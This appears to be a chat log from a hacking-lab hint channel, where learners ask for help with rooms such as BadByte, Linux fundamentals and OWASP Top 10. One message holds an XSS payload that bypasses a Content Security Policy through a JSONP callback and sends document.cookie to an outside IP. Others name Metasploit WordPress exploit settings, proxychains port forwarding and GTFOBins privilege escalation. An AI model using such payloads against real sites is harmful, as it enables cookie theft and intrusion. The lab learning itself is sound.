so it would be 4,6 and then 0?

#

because there is no perms

stuck fractal
#

Yep.

brisk pivot
#

oh yes!

#

I was over thinking

stuck fractal
#

arguably, there should be a comma no one else can read, write or execute the file. should be no one else can read, write, or execute the file.

brisk pivot
#

so if something is not in the list it is a "0" because it has not perms is that it?

stuck fractal
#

The permission digit is made up by adding 1,2,4

brisk pivot
#

yes

#

true

stuck fractal
#

So 0 is no permissions.

#

It ticks none of the boxes

brisk pivot
#

oh ok I think I get it

#

I got one on my own

#

ty for the help 👍

stuck fractal
#

it's something you'll get used to with practice

brisk pivot
#

yes

white salmon
#

i have a question regarding owasp top 10

stuck fractal
#

Just ask it.

#

Always ask your question directly.

white salmon
#

i can't find the .db file in task 11

#

while inspecting

#

hello?

stuck fractal
#

Firstly, please be patient

#

Secondly, you've leaked your name in that image along with most of your email

#

Thirdly I don't think you're going about it the right way?

white salmon
#

but is it necessary to hide my name?

#

cause i have the username same as my name

stuck fractal
#

I mean I'm just making you aware.

white salmon
#

ooh

#

thanks

stuck fractal
#

Did you answer question 1 in that task?

white salmon
#

yes

stuck fractal
#

So why the heck are you on the login page?

white salmon
#

to find the .db file

stuck fractal
#

It literally says at the start of question 2 to navigate to the directory you found in question 1

#

So why are you at the login page?

#

The login page is not the directory you found in question 1.

white salmon
#

?

#

how can i navigate to it?

stuck fractal
#

Don't post answers.

white salmon
#

ooh

#

ok

stuck fractal
#

You navigate to it by putting it in your navbar.

#

The address bar.

#

After the IP.

white salmon
#

ok

#

thanks

#

it worked

#

yessss

stuck fractal
#

If you don't understand the instructions, ask. Better to ask than to ignore the instructions and look at the wrong page totally.

white salmon
#

thank you once again

stuck fractal
#

Please do not call me bro.

white salmon
#

ooh ok

#

Stuck on Task 11 in the OWASP TOP 10 room

#

I already found the password hash using sqlite3 and cracked it but when I type the given password using 'admin' as the user it gives me an error 'invalid credentials' message

#

Nevermind - it has been solved*

stuck fractal
#

@white salmon do not post answers.

#

Especially not in room hints

white salmon
#

I thought I added the spoiler ? @stuck fractal

#

Anyway, I apologize

drifting scarab
#

Hello. I am stuck on room: Content Security Policy, flag for attack-5. I can't get document.cookie and tried everything I could think of, even read writeup and example writeup gave me didn't give me results. Is there anything wrong with this room?

my payload is this

<script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='http://10.10.228.138:8080/'.concat(encodeURIComponent(document.cookie)))"></script>

what am I doing wrong?

arctic light
#

Hi. I'm currently in the network services room, but there is target mentioned. How should I start my scanning?

true widget
#

I need a nudge for enumeration on tomghost.I tried directory bruteforcing with different directories but no success.Also tried enuemrating dns but no success.

true widget
arctic light
trim haven
arctic light
#

I'm connected in the machine, but I don't know on which IP to run nmap ( nmap ????)

stuck fractal
#

The IP under active machine information @arctic light

#

If you don't have one, then you haven't deployed the machine. Maybe you deplyed the attack box instead.

arctic light
#

@stuck fractal yes that's my case. thanks

cloud perch
#

ok so im doing badbyte. i need help I've been at it for hours trying to figure out exactly what cve the cms is vulnerable to i used wpscan to scan for vulnerabilities and still every time i submit the answer to task5 Q:

What is the CVE number for directory traversal vulnerability? i get the wrong answer can anyone give me a tip on what i should do?

median reef
#

don't use wpscan 🙂

#

use the tools that walkthrough suggests

cloud perch
#

well it says to Scan the internal web server and find vulnerable plugins using Nmap or the popular scanning tool for this CMS. isnt wpscan a popular tool for wordpress

#

@median reef what nmap script should i use

#

sorry for tagging you

median reef
#

no prob

median reef
#

when creating the room it could not find the plugin

cloud perch
#

so what should i do then use nmap

median reef
#

ls /usr/share/nmap/scripts/ | grep [cms-name]

#

you will find interesting scripts there

cloud perch
median reef
cloud perch
#

this is the outut i got does this look right http-wordpress-brute.nse
http-wordpress-enum.nse
http-wordpress-users.nse

median reef
#

🙂

#

yes

#

use the suitable

cloud perch
#

the enum

median reef
#

🙂

cloud perch
#

ok so it should tell me what its vulnerable to right?

median reef
#

it would give you list of plugins

#

you can read the script if you want more info

cloud perch
#

so basically just take that list and research

median reef
#

yeah

#

you can read about the scripts on nmap site

jaunty rain
#

trying to do the rick and morty room, and I'm a little stuck on the third ingredient anyone able to give me a nudge in the right direction?

jaunty rain
#

Ahh never mind I've found it.

cloud perch
#

on badbyte do i need to bruteforce login

safe wave
#

on ssh?

cloud perch
#

no wordpress

#

ok so on badbyte when using the metasploit exploit what file is import to look at im still stuck on figuring out what rce its vulnerable to

safe wave
#

if you use wpscan it can help you find users

cloud perch
#

i already have to username just trying to figure out if im supposed to use the traversal attack to get the password or whatever

#

lol

#

on badbyte can someone give me a hint on how to figure out What is the CVE number for remote code execution vulnerability? i have the one for the traversal but. i've been searching and im stucl

#

stuck*

median reef
#

did you found plugins?

median reef
candid nimbus
white salmon
#

Can someone explain me this question from room h4cked || The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

stark reef
#

badbyte - this hint gives me ssh error.. What am I doing wrong?
My command looks like this|| ssh -i id_rsa -L 8080:127.0.0.1:80||

stuck fractal
#

What's the error?

stark reef
stuck fractal
#

That aint an error

stark reef
#

Right, but it's wrong usage

#

and I'm doing what the hint says, right?

stuck fractal
#

You're misinterepreting the hint but yeah

#

led, you wanna take this one?

median reef
#

yeah sure

median reef
#

you still need to specify the ip of the box and username

stark reef
#

roger, ty

#

should be part of the hint I guess. First time I use proxychains like this for port forwarding

stuck fractal
#

I mean you could look up examples

#

Or realise that you're not specifying enough information, because it won't know where to do stuff

worn otter
#

This is probably more of a tech support question than a room hint, so I apologize if this is the wrong place to ask. In the BadByte room, task 4, proxychains/port forwarding, I'm having trouble getting the 'proxychains nmap -sT 127.0.0.1' command to work. It's reporting all 1000 ports are closed. I've exited the /etc/proxychains4.conf (I do not have a /etc/proxychains.conf- should I create one?) a few different ways, from information found through google. Uncommented dynamic_chain, commented out socks4 127.0.0.1 9050, added the socks5 as per the instructions in the room, and also tried with and without the proxy_dns line commented out. All with the same result- 1000 ports closed. I currently have two terminals open, one is actively logged into the ssh machine using the id_rsa found previously. Any tips/suggestions?

stark reef
#

Thats how I made it work anyway

worn otter
#

thanks, @stark reef ,I'll read it

balmy verge
#

since your changing the conf file for that

worn otter
#

using proxychains4 with same args as above reports 1000 ports closed

sweet raft
balmy verge
#

run netstat (or ss) -tunlp and make sure the port you specified is listening on your localhost

worn otter
#

So I think the missing piece was that I had not already started ssh in -D mode before running the proxychains command

worn otter
#

thanks to @cloud perch for the hints as well

median reef
#

btw for badbyte dynamic chain =/= dynamic port forwarding

#

the room can work with strict chain if other proxies are commented out

worn otter
#

thanks for the tip. I'll try that as well

median reef
#

🙂

round kite
#

room hint for privesec with /bin/systemctl

stuck fractal
#

GTFObins

round kite
#

thanks

worn otter
#

I think I need a metasploit hint. I'm using the exploit multi/http/wp_file_manager_rce (for the BadByte room, task 5). I've set rhosts to 127.0.0.1, rport to 8080, lhost to 127.0.0.1, lport to 4444, and run it. MSF uploads a file to the wordpress site/http server, but the file seems to contain just /*. Adding ?cmd=<command> to the url doesn't seem to do anything

modest swift
#

set LHOST to tun0

worn otter
#

okay, that opens a meterpreter session. That's new to me. I'll do some reading. Thanks.

slender sand
#

Has anyone tried solving badbyte ?

opal vine
#

hi
guys i'm stuck at badbyte how can i increase the search limit for the directory traversal \ RCE

#

i couldn't find those vulnerabilities

slender sand
#

I am not able to setup the dynamic port forwarding.

opal vine
#

did you find the port number that you need to forward?

median reef
median reef
#

are you getting any error

opal vine
median reef
#

no when using nmap script

#

while scanning the cms

slender sand
#

Error : no valid proxy found in config

#

Although I have added the socks5 /etc/proxychains.conf

median reef
#

can you screen shot the proxyconfig

slender sand
#

I did, but I don't have the permission to share it here

median reef
#

!docs verify

proud scarabBOT
median reef
#

pls verify yourself first

opal vine
#

@median reef

#

nmap localhost -p 8080 --script-args --search-limit=1500 -vv
i used this command and it didn't help

median reef
#

it does take time to run the whole scan

#

it might seem that it is stuck on 0%

opal vine
#

it only took 1 second

stark reef
#

you gotta specify the script too

median reef
opal vine
#

yup

#

i can view the wordpress on my localhost

median reef
#

nmap --script=script-name --script-args search-limit=1500 -p 8080 127.0.0.1

opal vine
#

|| http-wordpress-enum || ?

#

noice

brisk pivot
#

linux fundamental part 3, task 5, question 1. I don't get this question. How do you find files that have specific permissions?

#

like I don't understand what to do

median reef
#

in linux there is command that can be used to find files that have specific permissions

brisk pivot
#

ok yes I get that part

#

and now I need to find it

#

and the hind is this:

#

||The man page has this flag||

median reef
#

you need to find what is the flag

#

for finding permissions

brisk pivot
#

but the hint says to search in the man page

#

so I tried

#

||man find||

opal vine
#

try man find
and look for what flag do you need to specify in order to search for files based on their permission

median reef
# brisk pivot ||man find||

if you type /permissions(it will search for string permissions in the manual) you can read the man file easily and find the flag

brisk pivot
#

so just: /permissions ?

#

it says no such file or directory

median reef
#

yeah

brisk pivot
#

Ok so the only other thing that it says is: -bash but that doesn't work

median reef
brisk pivot
#

oh

opal vine
#

just type man find
and when the manual appears type "/permission" and look closely

brisk pivot
#

ah yes I got it!

#

ty 🙂

median reef
cloud perch
#

finally root badbyte fun room lil tuff though

median reef
#

did you learnt something new?

cloud perch
#

yeah

#

but i really wanna learn how to do it manually instead of using msf

white salmon
#

Did u scream "im in" hehe is it hard room tho ?

cloud perch
#

fuck yeah i scream im in man took me two days

#

lol

median reef
cloud perch
#

what the script

#

send it

opal vine
worn otter
#

I'd be interesting in taking a look as well

cloud perch
median reef
#

you can even use manually if you read the POC for the vuln

cloud perch
#

send me the script ill check it out..

#

im going to make a video on this room for my youtube channel

fathom ibex
#

Any hints on the privesc part of Badbyte?

worn otter
#

do you already have the password guessed?

fathom ibex
#

nope, just got the user shell

worn otter
#

in meterpreter, or a stable shell?

fathom ibex
#

stable

worn otter
#

have you found the old password?

fathom ibex
#

nope, not yet

worn otter
#

but you found the 3-letter username?

fathom ibex
#

yes

#

Im logged in as him

worn otter
#

Nobody knows how to use vim. Maybe that user left something useful